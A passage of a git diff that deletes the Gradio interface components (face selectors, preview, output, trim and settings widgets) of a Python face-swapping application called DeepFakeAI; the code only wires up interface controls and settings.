-from DeepFakeAI.uis.typing import Update - -FACE_ANALYSER_DIRECTION_DROPDOWN : Optional[gradio.Dropdown] = None -FACE_ANALYSER_AGE_DROPDOWN : Optional[gradio.Dropdown] = None -FACE_ANALYSER_GENDER_DROPDOWN : Optional[gradio.Dropdown] = None - - -def render() -> None: - global FACE_ANALYSER_DIRECTION_DROPDOWN - global FACE_ANALYSER_AGE_DROPDOWN - global FACE_ANALYSER_GENDER_DROPDOWN - - with gradio.Box(): - with gradio.Row(): - FACE_ANALYSER_DIRECTION_DROPDOWN = gradio.Dropdown( - label = wording.get('face_analyser_direction_dropdown_label'), - choices = DeepFakeAI.choices.face_analyser_direction, - value = DeepFakeAI.globals.face_analyser_direction - ) - FACE_ANALYSER_AGE_DROPDOWN = gradio.Dropdown( - label = wording.get('face_analyser_age_dropdown_label'), - choices = ['none'] + DeepFakeAI.choices.face_analyser_age, - value = DeepFakeAI.globals.face_analyser_age or 'none' - ) - FACE_ANALYSER_GENDER_DROPDOWN = gradio.Dropdown( - label = wording.get('face_analyser_gender_dropdown_label'), - choices = ['none'] + DeepFakeAI.choices.face_analyser_gender, - value = DeepFakeAI.globals.face_analyser_gender or 'none' - ) - ui.register_component('face_analyser_direction_dropdown', FACE_ANALYSER_DIRECTION_DROPDOWN) - ui.register_component('face_analyser_age_dropdown', FACE_ANALYSER_AGE_DROPDOWN) - ui.register_component('face_analyser_gender_dropdown', FACE_ANALYSER_GENDER_DROPDOWN) - - -def listen() -> None: - FACE_ANALYSER_DIRECTION_DROPDOWN.select(lambda value: update_dropdown('face_analyser_direction', value), inputs = FACE_ANALYSER_DIRECTION_DROPDOWN, outputs = FACE_ANALYSER_DIRECTION_DROPDOWN) - FACE_ANALYSER_AGE_DROPDOWN.select(lambda value: update_dropdown('face_analyser_age', value), inputs = FACE_ANALYSER_AGE_DROPDOWN, outputs = FACE_ANALYSER_AGE_DROPDOWN) - FACE_ANALYSER_GENDER_DROPDOWN.select(lambda value: update_dropdown('face_analyser_gender', value), inputs = FACE_ANALYSER_GENDER_DROPDOWN, outputs = FACE_ANALYSER_GENDER_DROPDOWN) - - -def update_dropdown(name : str, value : str) -> Update: - if value == 'none': - setattr(DeepFakeAI.globals, name, None) - else: - setattr(DeepFakeAI.globals, name, value) - return gradio.update(value = value) diff --git a/DeepFakeAI/uis/components/face_selector.py b/DeepFakeAI/uis/components/face_selector.py deleted file mode 100644 index b6f4c66e07c46ce0f961acbd99289e421cd4e619..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/face_selector.py +++ /dev/null @@ -1,133 +0,0 @@ -from typing import List, Optional, Tuple, Any, Dict -from time import sleep - -import cv2 -import gradio - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.capturer import get_video_frame -from DeepFakeAI.face_analyser import get_many_faces -from DeepFakeAI.face_reference import clear_face_reference -from DeepFakeAI.typing import Frame, FaceRecognition -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import ComponentName, Update -from DeepFakeAI.utilities import is_image, is_video - -FACE_RECOGNITION_DROPDOWN : Optional[gradio.Dropdown] = None -REFERENCE_FACE_POSITION_GALLERY : Optional[gradio.Gallery] = None -REFERENCE_FACE_DISTANCE_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global FACE_RECOGNITION_DROPDOWN - global REFERENCE_FACE_POSITION_GALLERY - global REFERENCE_FACE_DISTANCE_SLIDER - - with gradio.Box(): - reference_face_gallery_args: Dict[str, Any] = { - 'label': wording.get('reference_face_gallery_label'), - 'height': 120, - 'object_fit': 'cover', - 
'columns': 10, - 'allow_preview': False, - 'visible': 'reference' in DeepFakeAI.globals.face_recognition - } - if is_image(DeepFakeAI.globals.target_path): - reference_frame = cv2.imread(DeepFakeAI.globals.target_path) - reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) - if is_video(DeepFakeAI.globals.target_path): - reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) - FACE_RECOGNITION_DROPDOWN = gradio.Dropdown( - label = wording.get('face_recognition_dropdown_label'), - choices = DeepFakeAI.choices.face_recognition, - value = DeepFakeAI.globals.face_recognition - ) - REFERENCE_FACE_POSITION_GALLERY = gradio.Gallery(**reference_face_gallery_args) - REFERENCE_FACE_DISTANCE_SLIDER = gradio.Slider( - label = wording.get('reference_face_distance_slider_label'), - value = DeepFakeAI.globals.reference_face_distance, - maximum = 3, - step = 0.05, - visible = 'reference' in DeepFakeAI.globals.face_recognition - ) - ui.register_component('face_recognition_dropdown', FACE_RECOGNITION_DROPDOWN) - ui.register_component('reference_face_position_gallery', REFERENCE_FACE_POSITION_GALLERY) - ui.register_component('reference_face_distance_slider', REFERENCE_FACE_DISTANCE_SLIDER) - - -def listen() -> None: - FACE_RECOGNITION_DROPDOWN.select(update_face_recognition, inputs = FACE_RECOGNITION_DROPDOWN, outputs = [ REFERENCE_FACE_POSITION_GALLERY, REFERENCE_FACE_DISTANCE_SLIDER ]) - REFERENCE_FACE_POSITION_GALLERY.select(clear_and_update_face_reference_position) - REFERENCE_FACE_DISTANCE_SLIDER.change(update_reference_face_distance, inputs = REFERENCE_FACE_DISTANCE_SLIDER) - update_component_names : List[ComponentName] =\ - [ - 'target_file', - 'preview_frame_slider' - ] - for component_name in update_component_names: - component = ui.get_component(component_name) - if component: - component.change(update_face_reference_position, outputs = REFERENCE_FACE_POSITION_GALLERY) - select_component_names : List[ComponentName] =\ - [ - 'face_analyser_direction_dropdown', - 'face_analyser_age_dropdown', - 'face_analyser_gender_dropdown' - ] - for component_name in select_component_names: - component = ui.get_component(component_name) - if component: - component.select(update_face_reference_position, outputs = REFERENCE_FACE_POSITION_GALLERY) - - -def update_face_recognition(face_recognition : FaceRecognition) -> Tuple[Update, Update]: - if face_recognition == 'reference': - DeepFakeAI.globals.face_recognition = face_recognition - return gradio.update(visible = True), gradio.update(visible = True) - if face_recognition == 'many': - DeepFakeAI.globals.face_recognition = face_recognition - return gradio.update(visible = False), gradio.update(visible = False) - - -def clear_and_update_face_reference_position(event: gradio.SelectData) -> Update: - clear_face_reference() - return update_face_reference_position(event.index) - - -def update_face_reference_position(reference_face_position : int = 0) -> Update: - sleep(0.2) - gallery_frames = [] - DeepFakeAI.globals.reference_face_position = reference_face_position - if is_image(DeepFakeAI.globals.target_path): - reference_frame = cv2.imread(DeepFakeAI.globals.target_path) - gallery_frames = extract_gallery_frames(reference_frame) - if is_video(DeepFakeAI.globals.target_path): - reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - gallery_frames = 
extract_gallery_frames(reference_frame) - if gallery_frames: - return gradio.update(value = gallery_frames) - return gradio.update(value = None) - - -def update_reference_face_distance(reference_face_distance : float) -> Update: - DeepFakeAI.globals.reference_face_distance = reference_face_distance - return gradio.update(value = reference_face_distance) - - -def extract_gallery_frames(reference_frame : Frame) -> List[Frame]: - crop_frames = [] - faces = get_many_faces(reference_frame) - for face in faces: - start_x, start_y, end_x, end_y = map(int, face['bbox']) - padding_x = int((end_x - start_x) * 0.25) - padding_y = int((end_y - start_y) * 0.25) - start_x = max(0, start_x - padding_x) - start_y = max(0, start_y - padding_y) - end_x = max(0, end_x + padding_x) - end_y = max(0, end_y + padding_y) - crop_frame = reference_frame[start_y:end_y, start_x:end_x] - crop_frames.append(ui.normalize_frame(crop_frame)) - return crop_frames diff --git a/DeepFakeAI/uis/components/output.py b/DeepFakeAI/uis/components/output.py deleted file mode 100644 index f2f1736e9b6b6e9b394cbdfd635b87a570fa6f72..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/output.py +++ /dev/null @@ -1,55 +0,0 @@ -from typing import Tuple, Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.core import conditional_process -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import is_image, is_video, normalize_output_path, clear_temp - -OUTPUT_START_BUTTON : Optional[gradio.Button] = None -OUTPUT_CLEAR_BUTTON : Optional[gradio.Button] = None -OUTPUT_IMAGE : Optional[gradio.Image] = None -OUTPUT_VIDEO : Optional[gradio.Video] = None - - -def render() -> None: - global OUTPUT_START_BUTTON - global OUTPUT_CLEAR_BUTTON - global OUTPUT_IMAGE - global OUTPUT_VIDEO - - with gradio.Row(): - with gradio.Box(): - OUTPUT_IMAGE = gradio.Image( - label = wording.get('output_image_or_video_label'), - visible = False - ) - OUTPUT_VIDEO = gradio.Video( - label = wording.get('output_image_or_video_label') - ) - with gradio.Row(): - OUTPUT_START_BUTTON = gradio.Button(wording.get('start_button_label')) - OUTPUT_CLEAR_BUTTON = gradio.Button(wording.get('clear_button_label')) - - -def listen() -> None: - OUTPUT_START_BUTTON.click(update, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) - OUTPUT_CLEAR_BUTTON.click(clear, outputs = [ OUTPUT_IMAGE, OUTPUT_VIDEO ]) - - -def update() -> Tuple[Update, Update]: - DeepFakeAI.globals.output_path = normalize_output_path(DeepFakeAI.globals.source_path, DeepFakeAI.globals.target_path, '.') - if DeepFakeAI.globals.output_path: - conditional_process() - if is_image(DeepFakeAI.globals.output_path): - return gradio.update(value = DeepFakeAI.globals.output_path, visible = True), gradio.update(value = None, visible = False) - if is_video(DeepFakeAI.globals.output_path): - return gradio.update(value = None, visible = False), gradio.update(value = DeepFakeAI.globals.output_path, visible = True) - return gradio.update(value = None, visible = False), gradio.update(value = None, visible = False) - - -def clear() -> Tuple[Update, Update]: - if DeepFakeAI.globals.target_path: - clear_temp(DeepFakeAI.globals.target_path) - return gradio.update(value = None), gradio.update(value = None) diff --git a/DeepFakeAI/uis/components/output_settings.py b/DeepFakeAI/uis/components/output_settings.py deleted file mode 100644 index 4146cd955361fe738525c50b033054a6ae1b3a82..0000000000000000000000000000000000000000 --- 
a/DeepFakeAI/uis/components/output_settings.py +++ /dev/null @@ -1,43 +0,0 @@ -from typing import Optional -import gradio - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.typing import OutputVideoEncoder -from DeepFakeAI.uis.typing import Update - -OUTPUT_VIDEO_ENCODER_DROPDOWN : Optional[gradio.Dropdown] = None -OUTPUT_VIDEO_QUALITY_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global OUTPUT_VIDEO_ENCODER_DROPDOWN - global OUTPUT_VIDEO_QUALITY_SLIDER - - with gradio.Box(): - OUTPUT_VIDEO_ENCODER_DROPDOWN = gradio.Dropdown( - label = wording.get('output_video_encoder_dropdown_label'), - choices = DeepFakeAI.choices.output_video_encoder, - value = DeepFakeAI.globals.output_video_encoder - ) - OUTPUT_VIDEO_QUALITY_SLIDER = gradio.Slider( - label = wording.get('output_video_quality_slider_label'), - value = DeepFakeAI.globals.output_video_quality, - step = 1 - ) - - -def listen() -> None: - OUTPUT_VIDEO_ENCODER_DROPDOWN.select(update_output_video_encoder, inputs = OUTPUT_VIDEO_ENCODER_DROPDOWN, outputs = OUTPUT_VIDEO_ENCODER_DROPDOWN) - OUTPUT_VIDEO_QUALITY_SLIDER.change(update_output_video_quality, inputs = OUTPUT_VIDEO_QUALITY_SLIDER, outputs = OUTPUT_VIDEO_QUALITY_SLIDER) - - -def update_output_video_encoder(output_video_encoder: OutputVideoEncoder) -> Update: - DeepFakeAI.globals.output_video_encoder = output_video_encoder - return gradio.update(value = output_video_encoder) - - -def update_output_video_quality(output_video_quality : int) -> Update: - DeepFakeAI.globals.output_video_quality = output_video_quality - return gradio.update(value = output_video_quality) diff --git a/DeepFakeAI/uis/components/preview.py b/DeepFakeAI/uis/components/preview.py deleted file mode 100644 index f86acaacc7f83c814d73b29186e019e97034a45e..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/preview.py +++ /dev/null @@ -1,121 +0,0 @@ -from time import sleep -from typing import Any, Dict, Tuple, List, Optional -import cv2 -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.capturer import get_video_frame, get_video_frame_total -from DeepFakeAI.face_analyser import get_one_face -from DeepFakeAI.face_reference import get_face_reference, set_face_reference -from DeepFakeAI.predictor import predict_frame -from DeepFakeAI.processors.frame.core import load_frame_processor_module -from DeepFakeAI.typing import Frame -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import ComponentName, Update -from DeepFakeAI.utilities import is_video, is_image - -PREVIEW_IMAGE : Optional[gradio.Image] = None -PREVIEW_FRAME_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global PREVIEW_IMAGE - global PREVIEW_FRAME_SLIDER - - with gradio.Box(): - preview_image_args: Dict[str, Any] = { - 'label': wording.get('preview_image_label') - } - preview_frame_slider_args: Dict[str, Any] = { - 'label': wording.get('preview_frame_slider_label'), - 'step': 1, - 'visible': False - } - if is_image(DeepFakeAI.globals.target_path): - target_frame = cv2.imread(DeepFakeAI.globals.target_path) - preview_frame = extract_preview_frame(target_frame) - preview_image_args['value'] = ui.normalize_frame(preview_frame) - if is_video(DeepFakeAI.globals.target_path): - temp_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - preview_frame = extract_preview_frame(temp_frame) - preview_image_args['value'] = 
ui.normalize_frame(preview_frame) - preview_image_args['visible'] = True - preview_frame_slider_args['value'] = DeepFakeAI.globals.reference_frame_number - preview_frame_slider_args['maximum'] = get_video_frame_total(DeepFakeAI.globals.target_path) - preview_frame_slider_args['visible'] = True - PREVIEW_IMAGE = gradio.Image(**preview_image_args) - PREVIEW_FRAME_SLIDER = gradio.Slider(**preview_frame_slider_args) - ui.register_component('preview_frame_slider', PREVIEW_FRAME_SLIDER) - - -def listen() -> None: - PREVIEW_FRAME_SLIDER.change(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) - update_component_names : List[ComponentName] =\ - [ - 'source_file', - 'target_file', - 'face_recognition_dropdown', - 'reference_face_distance_slider', - 'frame_processors_checkbox_group' - ] - for component_name in update_component_names: - component = ui.get_component(component_name) - if component: - component.change(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) - select_component_names : List[ComponentName] =\ - [ - 'reference_face_position_gallery', - 'face_analyser_direction_dropdown', - 'face_analyser_age_dropdown', - 'face_analyser_gender_dropdown' - ] - for component_name in select_component_names: - component = ui.get_component(component_name) - if component: - component.select(update, inputs = PREVIEW_FRAME_SLIDER, outputs = [ PREVIEW_IMAGE, PREVIEW_FRAME_SLIDER ]) - - -def update(frame_number : int = 0) -> Tuple[Update, Update]: - sleep(0.1) - if is_image(DeepFakeAI.globals.target_path): - target_frame = cv2.imread(DeepFakeAI.globals.target_path) - preview_frame = extract_preview_frame(target_frame) - return gradio.update(value = ui.normalize_frame(preview_frame)), gradio.update(value = None, maximum = None, visible = False) - if is_video(DeepFakeAI.globals.target_path): - DeepFakeAI.globals.reference_frame_number = frame_number - video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) - temp_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - preview_frame = extract_preview_frame(temp_frame) - return gradio.update(value = ui.normalize_frame(preview_frame)), gradio.update(maximum = video_frame_total, visible = True) - return gradio.update(value = None), gradio.update(value = None, maximum = None, visible = False) - - -def extract_preview_frame(temp_frame : Frame) -> Frame: - if predict_frame(temp_frame): - return cv2.GaussianBlur(temp_frame, (99, 99), 0) - source_face = get_one_face(cv2.imread(DeepFakeAI.globals.source_path)) if DeepFakeAI.globals.source_path else None - temp_frame = reduce_preview_frame(temp_frame) - if 'reference' in DeepFakeAI.globals.face_recognition and not get_face_reference(): - reference_frame = get_video_frame(DeepFakeAI.globals.target_path, DeepFakeAI.globals.reference_frame_number) - reference_face = get_one_face(reference_frame, DeepFakeAI.globals.reference_face_position) - set_face_reference(reference_face) - reference_face = get_face_reference() if 'reference' in DeepFakeAI.globals.face_recognition else None - for frame_processor in DeepFakeAI.globals.frame_processors: - frame_processor_module = load_frame_processor_module(frame_processor) - if frame_processor_module.pre_process(): - temp_frame = frame_processor_module.process_frame( - source_face, - reference_face, - temp_frame - ) - return temp_frame - - -def reduce_preview_frame(temp_frame : Frame, max_height : int = 480) -> Frame: - height, width = 
temp_frame.shape[:2] - if height > max_height: - scale = max_height / height - max_width = int(width * scale) - temp_frame = cv2.resize(temp_frame, (max_width, max_height)) - return temp_frame diff --git a/DeepFakeAI/uis/components/processors.py b/DeepFakeAI/uis/components/processors.py deleted file mode 100644 index b87da139b019f6c51a1adc45ad65a09f4578aa66..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/processors.py +++ /dev/null @@ -1,41 +0,0 @@ -from typing import List, Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.processors.frame.core import load_frame_processor_module, clear_frame_processors_modules -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import list_module_names - -FRAME_PROCESSORS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None - - -def render() -> None: - global FRAME_PROCESSORS_CHECKBOX_GROUP - - with gradio.Box(): - FRAME_PROCESSORS_CHECKBOX_GROUP = gradio.CheckboxGroup( - label = wording.get('frame_processors_checkbox_group_label'), - choices = sort_frame_processors(DeepFakeAI.globals.frame_processors), - value = DeepFakeAI.globals.frame_processors - ) - ui.register_component('frame_processors_checkbox_group', FRAME_PROCESSORS_CHECKBOX_GROUP) - - -def listen() -> None: - FRAME_PROCESSORS_CHECKBOX_GROUP.change(update_frame_processors, inputs = FRAME_PROCESSORS_CHECKBOX_GROUP, outputs = FRAME_PROCESSORS_CHECKBOX_GROUP) - - -def update_frame_processors(frame_processors : List[str]) -> Update: - clear_frame_processors_modules() - DeepFakeAI.globals.frame_processors = frame_processors - for frame_processor in DeepFakeAI.globals.frame_processors: - frame_processor_module = load_frame_processor_module(frame_processor) - frame_processor_module.pre_check() - return gradio.update(value = frame_processors, choices = sort_frame_processors(frame_processors)) - - -def sort_frame_processors(frame_processors : List[str]) -> list[str]: - frame_processors_names = list_module_names('DeepFakeAI/processors/frame/modules') - return sorted(frame_processors_names, key = lambda frame_processor : frame_processors.index(frame_processor) if frame_processor in frame_processors else len(frame_processors)) diff --git a/DeepFakeAI/uis/components/settings.py b/DeepFakeAI/uis/components/settings.py deleted file mode 100644 index ec5c30b023f0ea5563a58dbaa5ea993a53ffba86..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/settings.py +++ /dev/null @@ -1,41 +0,0 @@ -from typing import Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.uis.typing import Update - -KEEP_FPS_CHECKBOX : Optional[gradio.Checkbox] = None -KEEP_TEMP_CHECKBOX : Optional[gradio.Checkbox] = None -SKIP_AUDIO_CHECKBOX : Optional[gradio.Checkbox] = None - - -def render() -> None: - global KEEP_FPS_CHECKBOX - global KEEP_TEMP_CHECKBOX - global SKIP_AUDIO_CHECKBOX - - with gradio.Box(): - KEEP_FPS_CHECKBOX = gradio.Checkbox( - label = wording.get('keep_fps_checkbox_label'), - value = DeepFakeAI.globals.keep_fps - ) - KEEP_TEMP_CHECKBOX = gradio.Checkbox( - label = wording.get('keep_temp_checkbox_label'), - value = DeepFakeAI.globals.keep_temp - ) - SKIP_AUDIO_CHECKBOX = gradio.Checkbox( - label = wording.get('skip_audio_checkbox_label'), - value = DeepFakeAI.globals.skip_audio - ) - - -def listen() -> None: - KEEP_FPS_CHECKBOX.change(lambda value: update_checkbox('keep_fps', value), inputs = KEEP_FPS_CHECKBOX, outputs = 
KEEP_FPS_CHECKBOX) - KEEP_TEMP_CHECKBOX.change(lambda value: update_checkbox('keep_temp', value), inputs = KEEP_TEMP_CHECKBOX, outputs = KEEP_TEMP_CHECKBOX) - SKIP_AUDIO_CHECKBOX.change(lambda value: update_checkbox('skip_audio', value), inputs = SKIP_AUDIO_CHECKBOX, outputs = SKIP_AUDIO_CHECKBOX) - - -def update_checkbox(name : str, value: bool) -> Update: - setattr(DeepFakeAI.globals, name, value) - return gradio.update(value = value) diff --git a/DeepFakeAI/uis/components/source.py b/DeepFakeAI/uis/components/source.py deleted file mode 100644 index 29b77715b0648d49761a466bb9374dd7c32c4150..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/source.py +++ /dev/null @@ -1,48 +0,0 @@ -from typing import Any, IO, Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import is_image - -SOURCE_FILE : Optional[gradio.File] = None -SOURCE_IMAGE : Optional[gradio.Image] = None - - -def render() -> None: - global SOURCE_FILE - global SOURCE_IMAGE - - with gradio.Box(): - is_source_image = is_image(DeepFakeAI.globals.source_path) - SOURCE_FILE = gradio.File( - file_count = 'single', - file_types= - [ - '.png', - '.jpg', - '.webp' - ], - label = wording.get('source_file_label'), - value = DeepFakeAI.globals.source_path if is_source_image else None - ) - ui.register_component('source_file', SOURCE_FILE) - SOURCE_IMAGE = gradio.Image( - value = SOURCE_FILE.value['name'] if is_source_image else None, - visible = is_source_image, - show_label = False - ) - - -def listen() -> None: - SOURCE_FILE.change(update, inputs = SOURCE_FILE, outputs = SOURCE_IMAGE) - - -def update(file: IO[Any]) -> Update: - if file and is_image(file.name): - DeepFakeAI.globals.source_path = file.name - return gradio.update(value = file.name, visible = True) - DeepFakeAI.globals.source_path = None - return gradio.update(value = None, visible = False) diff --git a/DeepFakeAI/uis/components/target.py b/DeepFakeAI/uis/components/target.py deleted file mode 100644 index 022cd8da664e0555e79f61bb875ffca47f98589e..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/target.py +++ /dev/null @@ -1,62 +0,0 @@ -from typing import Any, IO, Tuple, Optional -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.face_reference import clear_face_reference -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import is_image, is_video - -TARGET_FILE : Optional[gradio.File] = None -TARGET_IMAGE : Optional[gradio.Image] = None -TARGET_VIDEO : Optional[gradio.Video] = None - - -def render() -> None: - global TARGET_FILE - global TARGET_IMAGE - global TARGET_VIDEO - - with gradio.Box(): - is_target_image = is_image(DeepFakeAI.globals.target_path) - is_target_video = is_video(DeepFakeAI.globals.target_path) - TARGET_FILE = gradio.File( - label = wording.get('target_file_label'), - file_count = 'single', - file_types = - [ - '.png', - '.jpg', - '.webp', - '.mp4' - ], - value = DeepFakeAI.globals.target_path if is_target_image or is_target_video else None - ) - TARGET_IMAGE = gradio.Image( - value = TARGET_FILE.value['name'] if is_target_image else None, - visible = is_target_image, - show_label = False - ) - TARGET_VIDEO = gradio.Video( - value = TARGET_FILE.value['name'] if is_target_video else None, - visible = is_target_video, - show_label = False - ) - 
ui.register_component('target_file', TARGET_FILE) - - -def listen() -> None: - TARGET_FILE.change(update, inputs = TARGET_FILE, outputs = [ TARGET_IMAGE, TARGET_VIDEO ]) - - -def update(file : IO[Any]) -> Tuple[Update, Update]: - clear_face_reference() - if file and is_image(file.name): - DeepFakeAI.globals.target_path = file.name - return gradio.update(value = file.name, visible = True), gradio.update(value = None, visible = False) - if file and is_video(file.name): - DeepFakeAI.globals.target_path = file.name - return gradio.update(value = None, visible = False), gradio.update(value = file.name, visible = True) - DeepFakeAI.globals.target_path = None - return gradio.update(value = None, visible = False), gradio.update(value = None, visible = False) diff --git a/DeepFakeAI/uis/components/temp_frame.py b/DeepFakeAI/uis/components/temp_frame.py deleted file mode 100644 index e1236f787144a8f87b8809c862f790f2abe5186c..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/temp_frame.py +++ /dev/null @@ -1,44 +0,0 @@ -from typing import Optional -import gradio - -import DeepFakeAI.choices -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.typing import TempFrameFormat - -from DeepFakeAI.uis.typing import Update - -TEMP_FRAME_FORMAT_DROPDOWN : Optional[gradio.Dropdown] = None -TEMP_FRAME_QUALITY_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global TEMP_FRAME_FORMAT_DROPDOWN - global TEMP_FRAME_QUALITY_SLIDER - - with gradio.Box(): - TEMP_FRAME_FORMAT_DROPDOWN = gradio.Dropdown( - label = wording.get('temp_frame_format_dropdown_label'), - choices = DeepFakeAI.choices.temp_frame_format, - value = DeepFakeAI.globals.temp_frame_format - ) - TEMP_FRAME_QUALITY_SLIDER = gradio.Slider( - label = wording.get('temp_frame_quality_slider_label'), - value = DeepFakeAI.globals.temp_frame_quality, - step = 1 - ) - - -def listen() -> None: - TEMP_FRAME_FORMAT_DROPDOWN.select(update_temp_frame_format, inputs = TEMP_FRAME_FORMAT_DROPDOWN, outputs = TEMP_FRAME_FORMAT_DROPDOWN) - TEMP_FRAME_QUALITY_SLIDER.change(update_temp_frame_quality, inputs = TEMP_FRAME_QUALITY_SLIDER, outputs = TEMP_FRAME_QUALITY_SLIDER) - - -def update_temp_frame_format(temp_frame_format : TempFrameFormat) -> Update: - DeepFakeAI.globals.temp_frame_format = temp_frame_format - return gradio.update(value = temp_frame_format) - - -def update_temp_frame_quality(temp_frame_quality : int) -> Update: - DeepFakeAI.globals.temp_frame_quality = temp_frame_quality - return gradio.update(value = temp_frame_quality) diff --git a/DeepFakeAI/uis/components/trim_frame.py b/DeepFakeAI/uis/components/trim_frame.py deleted file mode 100644 index cf95f81e36e32ebcd7acbdfd4e15fb78618ce0c3..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/components/trim_frame.py +++ /dev/null @@ -1,65 +0,0 @@ -from time import sleep -from typing import Any, Dict, Tuple, Optional - -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import wording -from DeepFakeAI.capturer import get_video_frame_total -from DeepFakeAI.uis import core as ui -from DeepFakeAI.uis.typing import Update -from DeepFakeAI.utilities import is_video - -TRIM_FRAME_START_SLIDER : Optional[gradio.Slider] = None -TRIM_FRAME_END_SLIDER : Optional[gradio.Slider] = None - - -def render() -> None: - global TRIM_FRAME_START_SLIDER - global TRIM_FRAME_END_SLIDER - - with gradio.Box(): - trim_frame_start_slider_args : Dict[str, Any] = { - 'label': wording.get('trim_frame_start_slider_label'), - 'step': 1, - 'visible': False - } 
- trim_frame_end_slider_args : Dict[str, Any] = { - 'label': wording.get('trim_frame_end_slider_label'), - 'step': 1, - 'visible': False - } - if is_video(DeepFakeAI.globals.target_path): - video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) - trim_frame_start_slider_args['value'] = DeepFakeAI.globals.trim_frame_start or 0 - trim_frame_start_slider_args['maximum'] = video_frame_total - trim_frame_start_slider_args['visible'] = True - trim_frame_end_slider_args['value'] = DeepFakeAI.globals.trim_frame_end or video_frame_total - trim_frame_end_slider_args['maximum'] = video_frame_total - trim_frame_end_slider_args['visible'] = True - with gradio.Row(): - TRIM_FRAME_START_SLIDER = gradio.Slider(**trim_frame_start_slider_args) - TRIM_FRAME_END_SLIDER = gradio.Slider(**trim_frame_end_slider_args) - - -def listen() -> None: - target_file = ui.get_component('target_file') - if target_file: - target_file.change(remote_update, outputs = [ TRIM_FRAME_START_SLIDER, TRIM_FRAME_END_SLIDER ]) - TRIM_FRAME_START_SLIDER.change(lambda value : update_number('trim_frame_start', int(value)), inputs = TRIM_FRAME_START_SLIDER, outputs = TRIM_FRAME_START_SLIDER) - TRIM_FRAME_END_SLIDER.change(lambda value : update_number('trim_frame_end', int(value)), inputs = TRIM_FRAME_END_SLIDER, outputs = TRIM_FRAME_END_SLIDER) - - -def remote_update() -> Tuple[Update, Update]: - sleep(0.1) - if is_video(DeepFakeAI.globals.target_path): - video_frame_total = get_video_frame_total(DeepFakeAI.globals.target_path) - DeepFakeAI.globals.trim_frame_start = 0 - DeepFakeAI.globals.trim_frame_end = video_frame_total - return gradio.update(value = 0, maximum = video_frame_total, visible = True), gradio.update(value = video_frame_total, maximum = video_frame_total, visible = True) - return gradio.update(value = None, maximum = None, visible = False), gradio.update(value = None, maximum = None, visible = False) - - -def update_number(name : str, value : int) -> Update: - setattr(DeepFakeAI.globals, name, value) - return gradio.update(value = value) diff --git a/DeepFakeAI/uis/core.py b/DeepFakeAI/uis/core.py deleted file mode 100644 index 8db45e59b4fd981bc9e0866d1ccc135475219b68..0000000000000000000000000000000000000000 --- a/DeepFakeAI/uis/core.py +++ /dev/null @@ -1,67 +0,0 @@ -from typing import Dict, Optional, Any -import importlib -import sys -import cv2 -import gradio - -import DeepFakeAI.globals -from DeepFakeAI import metadata, wording -from DeepFakeAI.typing import Frame -from DeepFakeAI.uis.typing import Component, ComponentName - -COMPONENTS: Dict[ComponentName, Component] = {} -UI_LAYOUT_METHODS =\ -[ - 'pre_check', - 'render', - 'listen' -] - - -def launch() -> None: - with gradio.Blocks(theme = get_theme(), title = metadata.get('name') + ' ' + metadata.get('version')) as ui: - for ui_layout in DeepFakeAI.globals.ui_layouts: - ui_layout_module = load_ui_layout_module(ui_layout) - ui_layout_module.pre_check() - ui_layout_module.render() - ui_layout_module.listen() - ui.launch(debug=True, show_api=True) - - -def load_ui_layout_module(ui_layout : str) -> Any: - try: - ui_layout_module = importlib.import_module('DeepFakeAI.uis.layouts.' 
